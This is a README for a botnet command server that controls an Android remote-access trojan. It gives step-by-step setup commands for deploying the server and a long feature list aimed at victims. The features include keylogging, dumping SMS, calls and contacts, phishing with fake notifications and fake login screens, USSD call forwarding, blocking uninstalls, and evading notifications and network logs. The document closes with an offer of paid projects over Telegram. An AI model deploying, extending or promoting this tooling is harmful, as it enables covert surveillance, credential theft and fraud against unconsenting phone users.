Teardroid v4 Botnet API
This api is for teardroid v4 botnet
Please visit https://github.com/ScRiPt1337/Teardroid-phprat to know about teardroid and how to use it
- Clone Teardroidv4_api repo using the command below
$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
- Install uvicorn
$ sudo apt-get install uvicorn
$ python3 -m pip install uvicorn
- Change dir to Teardroidv4_api
$ cd Teardroidv4_api
- Install all dependency
$ pip install -r requirements.txt
- change project key to connect with database
- Set up an account at deta.sh and go to project keys and create a new key and copy it
$ nano ./db/database.py
from deta import Deta
from os import getenv
deta = Deta(getenv("DETA_PROJECT_KEY")) => deta = Deta("demo project key")
# replace getenv("DETA_PROJECT_KEY") with your deta.sh project key
# make sure your remove getenv
- open config.py and change the value of "hello" to any user_agent or text you want
- Run teardroid api
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host --port 80
# now close your terminal windows and we are good to go
- Change your user-agent of the browser with the value of USER_AGENT you have enter in config.py
- you can use this chrome extension to change user useragent extension
- Done
- Forground service bypass scatter does not show any notification while running in background.
- Auto launch bypass even in Chinese phone like redmi oppo vivo without auto launch permission.
- Does not create network logs and does not make http request in idle mode.
- Android battery optimization bypass without any permission.
- Keylogger ( capture everything client type on there keyboard )
- logs (log everything user click on)
- notification capture ( capture all the notification client recive )
- run ussd code ( run ussd code for call forwarding etc )
- fake notification attack ( send phishing link using fake notification that look like is from facebook, microsoft etc )
- injection ( add injection dynamically according to the installed apps on the client device )
- popup fake login screen ( popup any page on clients home page without url bar or title bar (so the client will think its from google or any other app))
- geo fencing
- dump sms, calls, contacts, installed apps
- download file
- shell command
- open url ( open any url on browser )
- open apps ( open any app on client device using there package name )
- auto allow permission ( automatically grant all the run time permission )
- uninstall protection (stop the victim from uninstalling the app or force stop the app)
- vnc
- take screenshot
- automatically take screenshot when user open any specific app ( example: if you set it to whatsapp it will take screenshot of the client's whatsapp whenever client will open whatsapp and click anything like opening convo or clicking on the send button )
- block number ( you can block number from victim device so the number can't call the victim )
- install any apk file in victim device
- uninstall any app from victim device
- wake up device and able to run for 1 to 3 hour with screen off
- Demo video available on my telegram channel => https://t.me/scatter1337
- Pm me on telegram https://t.me/script1337
- for paid project contact me on telegram
- I am only available on telegram and script1337 is my only account please double check the username
- you will not be able to access the dashboard if you dont change your user-agent with the same value of USER_AGENT inside config.py file.
- its to make you the dashboard more secure and to protect it from geting auto deleted from deta.sh